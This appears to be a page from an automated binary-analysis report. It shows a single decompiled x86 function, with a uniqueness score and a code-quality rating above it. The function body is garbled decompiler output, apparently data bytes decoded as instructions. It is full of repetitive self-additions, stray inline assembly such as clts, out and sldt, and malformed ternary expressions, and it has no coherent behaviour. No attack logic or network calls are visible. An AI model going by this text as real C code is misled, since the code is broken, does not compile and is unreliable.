                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E00185375(intOrPtr* __eax, intOrPtr* __ebx, signed int __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
                        				intOrPtr* _t403;
                        				signed char _t404;
                        				signed char _t405;
                        				signed char _t406;
                        				signed char _t407;
                        				signed char _t408;
                        				signed char _t409;
                        				signed char _t410;
                        				signed char* _t412;
                        				signed int _t413;
                        				signed int _t414;
                        				signed int _t415;
                        				intOrPtr* _t416;
                        				intOrPtr* _t419;
                        				intOrPtr* _t420;
                        				intOrPtr* _t421;
                        				intOrPtr* _t422;
                        				signed int _t424;
                        				signed char _t425;
                        				intOrPtr* _t426;
                        				char* _t430;
                        				signed int _t431;
                        				void* _t432;
                        				intOrPtr* _t433;
                        				signed int* _t434;
                        				signed char _t436;
                        				signed char _t437;
                        				signed char _t438;
                        				intOrPtr* _t439;
                        				intOrPtr* _t441;
                        				signed int _t443;
                        				char* _t444;
                        				intOrPtr* _t446;
                        				intOrPtr* _t448;
                        				intOrPtr* _t450;
                        				intOrPtr* _t452;
                        				intOrPtr* _t454;
                        				intOrPtr* _t456;
                        				signed int _t457;
                        				signed char _t459;
                        				signed int _t460;
                        				void* _t462;
                        				signed char _t463;
                        				intOrPtr* _t465;
                        				intOrPtr* _t466;
                        				signed int _t467;
                        				signed int _t468;
                        				void* _t469;
                        				void* _t470;
                        				void* _t471;
                        				signed char _t472;
                        				signed char _t473;
                        				void* _t474;
                        				signed int _t475;
                        				intOrPtr* _t476;
                        				intOrPtr* _t477;
                        				intOrPtr* _t478;
                        				signed char _t480;
                        				intOrPtr* _t481;
                        				intOrPtr* _t482;
                        				intOrPtr* _t483;
                        				signed int _t485;
                        				signed int _t486;
                        				signed int _t487;
                        				signed char _t489;
                        				void* _t492;
                        				signed int _t495;
                        				signed char _t497;
                        				signed char _t498;
                        				intOrPtr* _t499;
                        				intOrPtr* _t500;
                        				void* _t501;
                        				void* _t504;
                        				signed char _t508;
                        				intOrPtr _t509;
                        				char _t510;
                        				char _t511;
                        				intOrPtr* _t512;
                        				intOrPtr* _t514;
                        				intOrPtr* _t515;
                        				signed int* _t516;
                        				void* _t517;
                        				intOrPtr* _t518;
                        				void* _t519;
                        				void* _t521;
                        				void* _t522;
                        				signed char _t524;
                        				signed int _t527;
                        				intOrPtr* _t528;
                        				void* _t529;
                        				char* _t531;
                        				intOrPtr* _t533;
                        				void* _t535;
                        				void* _t538;
                        				signed char _t541;
                        				signed int* _t544;
                        				intOrPtr* _t545;
                        				intOrPtr* _t546;
                        				char* _t547;
                        				intOrPtr* _t548;
                        				signed char _t550;
                        				intOrPtr* _t551;
                        				void* _t553;
                        				void* _t555;
                        				void* _t559;
                        				void* _t568;
                        				intOrPtr* _t575;
                        				signed char _t577;
                        				intOrPtr* _t578;
                        				void* _t579;
                        				intOrPtr* _t580;
                        				void* _t581;
                        				void* _t582;
                        				void* _t584;
                        				signed char _t585;
                        				intOrPtr* _t587;
                        				void* _t588;
                        				intOrPtr* _t590;
                        				void* _t593;
                        				intOrPtr* _t597;
                        				signed int _t598;
                        				signed int _t599;
                        				signed int _t600;
                        				intOrPtr* _t603;
                        				signed int* _t604;
                        				signed int* _t605;
                        				signed char _t606;
                        				intOrPtr* _t608;
                        				signed char _t609;
                        				signed int _t610;
                        				void* _t611;
                        				signed int* _t613;
                        				signed int* _t614;
                        				signed int* _t615;
                        				signed int* _t616;
                        				signed int* _t617;
                        				void* _t618;
                        				signed int _t619;
                        				signed int _t620;
                        				signed int _t621;
                        				void* _t623;
                        				void* _t628;
                        				void* _t629;
                        				void* _t631;
                        				void* _t633;
                        
                        				_t597 = __edi;
                        				_t499 = __ebx;
                        				 *(__edi + 0x64003002) =  *(__edi + 0x64003002) | __ecx;
                        				asm("das");
                        				 *__eax =  *__eax + __eax;
                        				 *__eax =  *__eax + __eax;
                        				_t527 =  *__eax;
                        				 *__eax = __ecx;
                        				_t575 =  *((intOrPtr*)(_t623 + _t527 * 2));
                        				 *((intOrPtr*)(__edi + _t611)) =  *((intOrPtr*)(__edi + _t611)) + __ebx;
                        				_t528 =  *__eax;
                        				 *__eax = _t527;
                        				asm("wait");
                        				asm("adc al, 0x4c");
                        				_t603 = __esi +  *__eax +  *_t528;
                        				_t403 = __eax + _t575;
                        				asm("das");
                        				 *_t403 =  *_t403 + _t403;
                        				 *_t403 =  *_t403 + _t403;
                        				_t404 =  *_t403;
                        				 *_t404 = _t403;
                        				if( *_t403 <= 0) {
                        					_push(es);
                        					 *_t575 =  *_t575 + _t575;
                        					 *_t603 =  *_t603 + _t528;
                        					 *_t404 =  *_t404 ^ _t404;
                        					 *_t404 =  *_t404 + _t404;
                        					 *((intOrPtr*)(_t603 + 0x6101d18)) =  *((intOrPtr*)(_t603 + 0x6101d18)) + _t404;
                        					 *_t575 =  *_t575 + _t575;
                        					 *_t404 =  *_t404 + __ebx;
                        					 *_t404 =  *_t404 ^ _t404;
                        				}
                        				 *_t404 =  *_t404 + _t404;
                        				 *((intOrPtr*)(_t528 - 0x28f62df8)) =  *((intOrPtr*)(_t528 - 0x28f62df8)) + _t404;
                        				 *_t575 =  *_t575 + _t603;
                        				 *((intOrPtr*)(_t404 + _t603)) =  *((intOrPtr*)(_t404 + _t603)) + _t499;
                        				 *_t404 =  *_t404 + _t404;
                        				 *_t404 =  *_t404 + _t404;
                        				 *_t404 =  *_t404 | 0x01d713c2;
                        				_t405 = _t404 ^  *_t404;
                        				asm("pushad");
                        				 *_t405 =  *_t405 ^ _t405;
                        				 *_t405 =  *_t405 + _t405;
                        				 *((intOrPtr*)(_t603 + 0x6101d18)) =  *((intOrPtr*)(_t603 + 0x6101d18)) + _t405;
                        				 *_t575 =  *_t575 + _t575;
                        				 *_t405 =  *_t405 + _t575;
                        				 *_t405 =  *_t405 ^ _t405;
                        				 *_t405 =  *_t405 + _t405;
                        				 *((intOrPtr*)(_t528 + 0x100e0c00)) =  *((intOrPtr*)(_t528 + 0x100e0c00)) + _t405;
                        				_push(es);
                        				_t406 = _t405 ^  *_t405;
                        				 *_t528 = _t575;
                        				 *_t406 =  *_t406 + _t406;
                        				 *_t406 =  *_t406 + _t406;
                        				 *_t406 =  *_t406 + 0x6160d12;
                        				_t407 = _t406 ^  *_t406;
                        				asm("pushfd");
                        				 *_t407 =  *_t407 ^ _t407;
                        				 *_t407 =  *_t407 + _t407;
                        				 *((intOrPtr*)(_t528 - 0x4eeb4800)) =  *((intOrPtr*)(_t528 - 0x4eeb4800)) + _t407;
                        				_t604 = _t603 +  *_t499;
                        				 *_t597 =  *_t597 + _t528;
                        				_t408 = _t407 ^  *_t407;
                        				 *_t408 =  *_t408 + _t408;
                        				 *((intOrPtr*)(_t528 + 0x220a8300)) =  *((intOrPtr*)(_t528 + 0x220a8300)) + _t408;
                        				 *_t408 =  *_t408 + _t408;
                        				 *((intOrPtr*)(_t528 + 0x220a7300)) =  *((intOrPtr*)(_t528 + 0x220a7300)) + _t408;
                        				_t577 = _t575 +  *0x321e00 +  *_t597;
                        				 *_t408 =  *_t408 + _t499;
                        				_t409 = _t408 ^  *_t408;
                        				 *_t409 =  *_t409 + _t409;
                        				 *((intOrPtr*)(_t528 + 0x10044b00)) =  *((intOrPtr*)(_t528 + 0x10044b00)) + _t409;
                        				 *_t528 =  *_t528 + _t499;
                        				 *((intOrPtr*)(_t604 + _t577)) =  *((intOrPtr*)(_t604 + _t577)) + _t528;
                        				 *_t409 =  *_t409 + 0x28f0425;
                        				asm("outsb");
                        				_t410 = _t409 ^ 0x00000000;
                        				 *_t410 =  *_t410 + _t410;
                        				 *((intOrPtr*)(_t528 + 0x60ac500)) =  *((intOrPtr*)(_t528 + 0x60ac500)) + _t410;
                        				 *_t577 =  *_t577 + _t499;
                        				 *((intOrPtr*)(_t410 + 0x34)) =  *((intOrPtr*)(_t410 + 0x34)) + _t410;
                        				 *((intOrPtr*)(_t528 + 0x1d08c400)) =  *((intOrPtr*)(_t528 + 0x1d08c400)) + _t410;
                        				_push(es);
                        				 *(_t410 + _t410) =  *(_t410 + _t410) << 1;
                        				 *_t410 =  *_t410 + _t410;
                        				_t500 = _t499 + _t499;
                        				_t412 =  &((_t410 + _t410)[0x3c0015]);
                        				 *0 =  *0 | _t577;
                        				 *_t412 =  *_t412 + 0x6250e99;
                        				 *_t412 =  &(_t412[ *_t412]);
                        				 *((intOrPtr*)(_t528 + 0x6145b00)) =  *((intOrPtr*)(_t528 + 0x6145b00)) + _t412;
                        				 *_t604 =  *_t604 + _t500;
                        				 *_t500 =  *_t500 + _t577;
                        				 *_t412 =  *_t412 + 0x2220064;
                        				 *[ds:edi] =  *[ds:edi] + _t500;
                        				 *_t412 =  *_t412 + 0x222010b;
                        				_t413 =  &(_t412[1]);
                        				 *((intOrPtr*)(_t611 + 0x3d)) =  *((intOrPtr*)(_t611 + 0x3d)) + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x2220172;
                        				_t578 = _t577 + 1;
                        				 *((intOrPtr*)(_t413 + 0x3d)) =  *((intOrPtr*)(_t413 + 0x3d)) + _t578;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x60017;
                        				_t529 = _t528 + _t578;
                        				 *_t413 =  *_t413 + 0x600f2;
                        				 *_t597 =  *_t597 + _t500;
                        				 *[ds:eax] =  *[ds:eax] + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x62b0073;
                        				 *_t413 =  *_t413 + _t529;
                        				 *[ds:eax] =  *[ds:eax] + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 = _t529;
                        				_t414 = _t413 ^ 0x4401d702;
                        				 *((intOrPtr*)(_t414 + 0x3e)) =  *((intOrPtr*)(_t414 + 0x3e)) + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				_t531 =  *_t414;
                        				 *_t414 =  *_t413;
                        				 *_t531 =  *_t531 - 1;
                        				asm("xlatb");
                        				 *((intOrPtr*)(_t414 + _t414 + 0x58)) =  *((intOrPtr*)(_t414 + _t414 + 0x58)) + _t414;
                        				 *[ds:eax] =  *[ds:eax] + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				 *_t414 = _t531;
                        				asm("rcl dword [ecx], cl");
                        				 *_t604 =  *_t604 ^ _t414;
                        				 *((intOrPtr*)(_t604 + _t597)) =  *((intOrPtr*)(_t604 + _t597)) + _t500;
                        				_t533 =  *_t414;
                        				_push(_t597);
                        				_t415 = _t414 | 0x0044063c;
                        				asm("aam 0x3e");
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				_t501 =  *_t415;
                        				 *_t415 = _t500;
                        				asm("sbb eax, 0x44032910");
                        				 *((intOrPtr*)(_t597 + _t597)) =  *((intOrPtr*)(_t597 + _t597)) + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + 0x60b32;
                        				_t605 =  &(_t604[0]);
                        				 *((intOrPtr*)(_t597 + _t597)) =  *((intOrPtr*)(_t597 + _t597)) + _t533;
                        				_t416 =  *_t415;
                        				 *_t416 = _t415;
                        				_t417 =  >=  ?  *_t605 : _t416;
                        				_t606 =  &(_t605[0]);
                        				_t418 = ( >=  ?  *_t605 : _t416) + _t501;
                        				_t419 = ( >=  ?  *_t605 : _t416) + _t501 + 1;
                        				 *_t419 =  *_t419 + _t419;
                        				 *_t419 =  *_t419 + _t419;
                        				_t420 =  *_t419;
                        				 *_t420 = _t419;
                        				_t628 = _t533;
                        				asm("clts");
                        				 *_t533 =  *_t533 + _t533;
                        				asm("adc [ecx], al");
                        				 *_t420 =  *_t420 + _t420;
                        				 *((intOrPtr*)(_t533 + 0x48133100)) =  *((intOrPtr*)(_t533 + 0x48133100)) + _t420;
                        				_push(es);
                        				 *_t420 =  *_t420 + _t578;
                        				_t535 = _t533 - 1 + 1;
                        				 *_t420 =  *_t420 + _t420;
                        				 *_t420 =  *_t420 + _t420;
                        				_t421 =  *_t420;
                        				 *_t421 = _t420;
                        				_t422 = _t421 + _t535;
                        				 *_t422 =  *_t422 + _t422;
                        				 *_t422 =  *_t422 + _t422;
                        				 *_t422 = _t535 + 1;
                        				_t424 = _t422 + 0x50065b;
                        				 *_t578 =  *_t578 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *((intOrPtr*)(_t606 + 0x3c0cf808)) =  *((intOrPtr*)(_t606 + 0x3c0cf808)) + _t424;
                        				_push(es);
                        				_push(_t424);
                        				 *_t424 =  *_t424 + _t501;
                        				_t579 = _t578 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 = _t501;
                        				asm("sbb eax, 0x50065f10");
                        				 *_t424 =  *_t424 + _t579;
                        				_t580 = _t579 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t538 =  *_t424;
                        				 *_t424 =  *_t422;
                        				 *((intOrPtr*)(_t424 + 0x42)) =  *((intOrPtr*)(_t424 + 0x42)) + _t538;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 = _t538;
                        				asm("rol dword [ecx], 0x1");
                        				 *_t580 =  *_t580 + _t580;
                        				_push(_t628);
                        				_t581 = _t580 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				asm("int 0x1");
                        				asm("xlatb");
                        				 *0x5201d701 =  *0x5201d701 + _t581;
                        				asm("insb");
                        				_t582 = _t581 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t541 =  *_t424;
                        				asm("rol dword [ecx], cl");
                        				 *_t424 =  *_t424 + _t424;
                        				_push(0x5201d701);
                        				 *((intOrPtr*)(_t606 + 0x42)) =  *((intOrPtr*)(_t606 + 0x42)) + _t582;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t504 =  *_t424;
                        				 *_t424 = 0x5201d701;
                        				asm("sbb eax, 0x54032910");
                        				 *((intOrPtr*)(_t424 + 0x42)) =  *((intOrPtr*)(_t424 + 0x42)) + _t582;
                        				 *((intOrPtr*)(_t606 + 0x67167508)) =  *((intOrPtr*)(_t606 + 0x67167508)) + _t582;
                        				_push(es);
                        				 *((intOrPtr*)(_t582 + _t424 * 2)) =  *((intOrPtr*)(_t582 + _t424 * 2)) + _t541;
                        				_t425 = _t606;
                        				 *(_t541 + 0x58066716) =  *(_t541 + 0x58066716) | _t425;
                        				_t426 = _t425 + _t541;
                        				 *_t426 =  *_t426 + _t426;
                        				 *_t426 =  *_t426 + _t426;
                        				_t608 = _t426;
                        				_t584 = es;
                        				_t430 = (_t424 | _t541 | 0x0000006f) + _t504;
                        				_t585 = _t584 + 1;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 = 0xfc;
                        				asm("adc [eax+0x1], ebx");
                        				_t629 = _t606;
                        				 *((intOrPtr*)(_t430 + 0x43)) =  *((intOrPtr*)(_t430 + 0x43)) + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 = 0x2d;
                        				_t431 = _t430 + 0xd7;
                        				 *0x4a064e15 =  *0x4a064e15 + 0x5201d701;
                        				 *_t431 =  *_t431 + _t431;
                        				 *((intOrPtr*)(_t608 + 0x3c0cf808)) =  *((intOrPtr*)(_t608 + 0x3c0cf808)) + _t431;
                        				_t613 = es;
                        				 *((intOrPtr*)(0x5201d701 + _t431 * 2)) =  *((intOrPtr*)(0x5201d701 + _t431 * 2)) + _t504;
                        				 *_t431 = _t541;
                        				_t432 = _t431 + 0x5d06780d;
                        				 *((intOrPtr*)(_t608 + 0x43)) =  *((intOrPtr*)(_t608 + 0x43)) + _t432;
                        				 *((intOrPtr*)(_t608 + 0x78101d18)) =  *((intOrPtr*)(_t608 + 0x78101d18)) + _t432;
                        				_t609 = es;
                        				 *((intOrPtr*)(_t597 + 0x43)) =  *((intOrPtr*)(_t597 + 0x43)) + _t585;
                        				 *((intOrPtr*)(_t609 + 0x78101d18)) =  *((intOrPtr*)(_t609 + 0x78101d18)) + _t432;
                        				_t598 = es;
                        				_t433 = _t432 + _t432;
                        				 *_t433 =  *_t433 + _t433;
                        				 *_t433 =  *_t433 + _t433;
                        				_t434 =  *_t431;
                        				_t544 = _t433 + _t585;
                        				 *_t544 =  *_t544 + _t585;
                        				_t436 =  &(_t434[0x18]) & _t434[0x18];
                        				 *_t436 =  *_t436 + _t436;
                        				 *0x5811F419 =  *((intOrPtr*)(0x5811f419)) + _t436;
                        				 *_t436 =  *_t436 + _t436;
                        				 *(_t436 + _t436) =  *(_t436 + _t436) & _t436;
                        				 *_t436 =  *_t436 + _t436;
                        				_t437 = _t504 + 0x00000001 |  *_t434;
                        				 *(_t598 + 0x60067e0e) =  *(_t598 + 0x60067e0e) | _t585;
                        				 *((intOrPtr*)(_t437 + 0x44)) =  *((intOrPtr*)(_t437 + 0x44)) + _t544;
                        				 *_t437 =  *_t437 + _t437;
                        				 *_t437 =  *_t437 + _t437;
                        				_t438 = _t436;
                        				_t508 = _t437;
                        				_t121 = 0x4a064e15 + _t438 + 0x600684;
                        				 *_t121 =  *(0x4a064e15 + _t438 + 0x600684) | _t585;
                        				if( *_t121 <= 0) {
                        					 *_t438 =  *_t438 + _t438;
                        					 *_t438 =  *_t438 + _t438;
                        					_t497 = _t508;
                        					_t524 = _t438;
                        					 *(_t497 + 0x60068a05) =  *(_t497 + 0x60068a05) | _t497;
                        					 *((intOrPtr*)(_t497 + 0x44)) =  *((intOrPtr*)(_t497 + 0x44)) + _t544;
                        					 *((intOrPtr*)(_t524 - 0x6efea5f8)) =  *((intOrPtr*)(_t524 - 0x6efea5f8)) + _t585;
                        					_push(es);
                        					asm("popad");
                        					 *((intOrPtr*)(_t497 + 0x44)) =  *((intOrPtr*)(_t497 + 0x44)) + _t524;
                        					 *((intOrPtr*)(_t524 - 0x6efc75f8)) =  *((intOrPtr*)(_t524 - 0x6efc75f8)) + _t585;
                        					_push(es);
                        					asm("popad");
                        					_t498 = _t544 + _t497;
                        					 *_t498 =  *_t498 + _t498;
                        					 *_t498 =  *_t498 + _t498;
                        					_t438 = _t609;
                        					_t609 = _t498;
                        					 *_t544 =  *_t544 | _t524;
                        					asm("adc al, 0x97");
                        					_push(es);
                        					asm("popad");
                        					_t629 = _t629 + 2;
                        					 *_t438 =  *_t438 + _t438;
                        					 *_t438 =  *_t438 + _t438;
                        					_t508 =  *_t438;
                        					 *_t438 = _t524 + _t524;
                        					asm("sbb eax, 0x61000610");
                        					 *_t438 =  *_t438 + _t544;
                        				}
                        				 *_t613 =  *_t613 | _t438;
                        				 *_t438 =  *_t438 + _t438;
                        				_t544[0x6040a46] = _t544[0x6040a46] + _t585;
                        				_t439 = _t438 + 0x61;
                        				 *_t609 =  *_t609 + _t508;
                        				_t614 =  &(_t613[0]);
                        				 *_t439 =  *_t439 + _t439;
                        				 *_t439 =  *_t439 + _t439;
                        				_t545 = _t439;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t441 =  &(_t544[0x18]);
                        				 *((intOrPtr*)(_t614 + _t508)) =  *((intOrPtr*)(_t614 + _t508)) + _t545;
                        				_t509 =  *_t441;
                        				 *_t441 = _t508;
                        				asm("sbb eax, 0x61000610");
                        				 *_t585 =  *_t585 + _t545;
                        				_t615 =  &(_t614[0]);
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + 0xffffffac;
                        				 *((intOrPtr*)(_t609 + _t441 + 0x45310061)) =  *((intOrPtr*)(_t609 + _t441 + 0x45310061)) + _t509;
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + _t441;
                        				_t546 = _t441;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t443 = _t545 + 0x61;
                        				 *((intOrPtr*)(_t509 + _t615)) =  *((intOrPtr*)(_t509 + _t615)) + _t546;
                        				_t510 =  *_t443;
                        				 *_t443 = _t509;
                        				asm("sbb eax, 0x61000610");
                        				 *0x45 =  *0x45 + _t510;
                        				 *((intOrPtr*)(_t510 - 0x5eff5400)) =  *((intOrPtr*)(_t510 - 0x5eff5400)) + _t443;
                        				_push(es);
                        				asm("popad");
                        				 *((intOrPtr*)(_t615 + _t443 * 2)) =  *((intOrPtr*)(_t615 + _t443 * 2)) + _t443;
                        				 *_t443 =  *_t443 + _t443;
                        				 *((intOrPtr*)(_t546 + 0x18102918)) =  *((intOrPtr*)(_t546 + 0x18102918)) + _t585;
                        				_t444 = _t443 + 0x61;
                        				 *((intOrPtr*)(_t510 + _t615)) =  *((intOrPtr*)(_t510 + _t615)) + _t546;
                        				_t511 =  *_t444;
                        				 *_t444 = _t510;
                        				asm("sbb eax, 0x61000610");
                        				 *((intOrPtr*)(_t444 + 0x45)) =  *((intOrPtr*)(_t444 + 0x45)) + _t585;
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + 0xffffffac;
                        				 *((intOrPtr*)(_t609 + 0x57006106)) =  *((intOrPtr*)(_t609 + 0x57006106)) + _t444;
                        				_t616 =  &(_t615[0]);
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + _t444;
                        				_t547 = _t444;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t446 = _t546 + 0x61;
                        				 *((intOrPtr*)(_t511 + _t616)) =  *((intOrPtr*)(_t511 + _t616)) + _t547;
                        				_t512 =  *_t446;
                        				 *_t446 = _t511;
                        				asm("sbb eax, 0x61000610");
                        				 *((intOrPtr*)(_t512 + 0x45)) =  *((intOrPtr*)(_t512 + 0x45)) + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + 0xffffffac;
                        				 *((intOrPtr*)(_t512 + 0x6106)) =  *((intOrPtr*)(_t512 + 0x6106)) + _t547;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t512 =  *_t512 + _t446;
                        				 *((intOrPtr*)(_t609 - 0x69efe2e8)) =  *((intOrPtr*)(_t609 - 0x69efe2e8)) + _t446;
                        				 *_t547 =  *_t547 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t446 =  *_t446 + _t446;
                        				 *_t547 = 0x7a;
                        				_t448 = _t446 +  *_t446 + 0x2b;
                        				_push(es);
                        				asm("arpl [eax], ax");
                        				 *_t448 =  *_t448 + _t448;
                        				 *_t448 =  *_t448 + _t448;
                        				 *_t547 = 0x75;
                        				_t450 = _t448 +  *_t448 + 0xb0;
                        				_push(es);
                        				asm("arpl [eax], ax");
                        				 *_t450 =  *_t450 + _t450;
                        				 *_t450 =  *_t450 + _t450;
                        				 *_t547 = 0x6b;
                        				_t452 = _t450 +  *_t450 + 0xb8;
                        				_push(es);
                        				 *[gs:edx+0x45] =  *[gs:edx+0x45] + _t547;
                        				 *_t452 =  *_t452 + _t452;
                        				 *_t452 =  *_t452 + _t452;
                        				_t548 = _t452;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t454 = _t547 + 0x66;
                        				 *((intOrPtr*)(_t512 + _t616)) =  *((intOrPtr*)(_t512 + _t616)) + _t548;
                        				 *_t454 = _t512;
                        				asm("sbb eax, 0x66000610");
                        				 *((intOrPtr*)(_t609 + 0x45)) =  *((intOrPtr*)(_t609 + 0x45)) + _t585;
                        				 *_t454 =  *_t454 + _t454;
                        				 *_t454 =  *_t454 + _t454;
                        				 *_t454 =  *_t454 + 0x50;
                        				_t456 = _t454 + _t585 + 0x2b8c0066;
                        				 *_t456 =  *_t456 + _t456;
                        				 *_t456 =  *_t456 + _t456;
                        				_t514 =  *_t456;
                        				 *_t456 =  *_t454;
                        				asm("sbb eax, 0x67000610");
                        				 *((intOrPtr*)(_t456 + 0x45)) =  *((intOrPtr*)(_t456 + 0x45)) + _t456;
                        				 *((intOrPtr*)(_t514 - 0x2bff2600)) =  *((intOrPtr*)(_t514 - 0x2bff2600)) + _t456;
                        				_t457 = _t456 + 0x45ac0067;
                        				 *_t457 =  *_t457 + _t457;
                        				 *_t457 =  *_t457 + _t457;
                        				 *_t457 = _t548;
                        				_t459 = (_t457 ^ 0x68063c0d) + _t514;
                        				_t617 =  &(_t616[0]);
                        				 *_t459 =  *_t459 + _t459;
                        				 *_t459 =  *_t459 + _t459;
                        				_t550 =  *_t459;
                        				 *_t459 =  *_t457;
                        				 *__edx = 5;
                        				_push(0x45f400);
                        				 *_t459 =  *_t459 + _t459;
                        				 *((intOrPtr*)(_t609 - 0x40efe2e8)) =  *((intOrPtr*)(_t609 - 0x40efe2e8)) + _t459;
                        				_push(es);
                        				_push(0x460c00);
                        				 *_t459 =  *_t459 + _t459;
                        				 *((intOrPtr*)(_t609 - 0x40efe2e8)) =  *((intOrPtr*)(_t609 - 0x40efe2e8)) + _t459;
                        				_push(es);
                        				_push(0);
                        				_t460 = _t459 & 0x00000046;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				asm("out 0x1, al");
                        				asm("fimul word [0x6c05e6]");
                        				 *_t514 = gs;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				_t515 =  *_t460;
                        				 *_t460 = _t514;
                        				asm("sbb eax, 0x6d000610");
                        				 *((intOrPtr*)(_t609 + _t460 * 2)) =  *((intOrPtr*)(_t609 + _t460 * 2)) + _t515;
                        				 *_t460 =  *_t460 + _t460;
                        				 *((intOrPtr*)(_t515 + 0x600bb00)) =  *((intOrPtr*)(_t515 + 0x600bb00)) + _t460;
                        				 *_t617 =  *_t617 + _t550;
                        				 *_t515 = gs;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				_t516 =  *_t460;
                        				 *_t460 = _t515;
                        				asm("sbb eax, 0x6d000610");
                        				_t610 = _t609 + 1;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t460 =  *_t460 + 0xffffffc9;
                        				_t587 = _t585 + _t550 + _t460;
                        				_push(es);
                        				asm("insd");
                        				 *_t460 =  *_t460 + _t460;
                        				 *_t550 =  *_t550 + _t460;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *((intOrPtr*)(_t460 + 0x1000008)) =  *((intOrPtr*)(_t460 + 0x1000008)) + _t550;
                        				 *_t460 =  *_t460 + _t460;
                        				_push(_t516);
                        				_t462 = _t460 + 0x10000;
                        				 *_t550 =  *_t550 + _t462;
                        				 *((intOrPtr*)(_t462 + 0x210100f)) =  *((intOrPtr*)(_t462 + 0x210100f)) + _t516;
                        				_t463 = _t462 + _t550;
                        				asm("sldt word [eax]");
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t516 =  *_t516 | _t550;
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				 *0x10000 =  *0x10000 & _t463;
                        				_t517 = ss;
                        				_push(es);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
                        				 *_t463 =  *_t463 + _t463;
                        				 *_t463 =  *_t463 + _t463;
                        				asm("scasd");
                        				_push(ss);
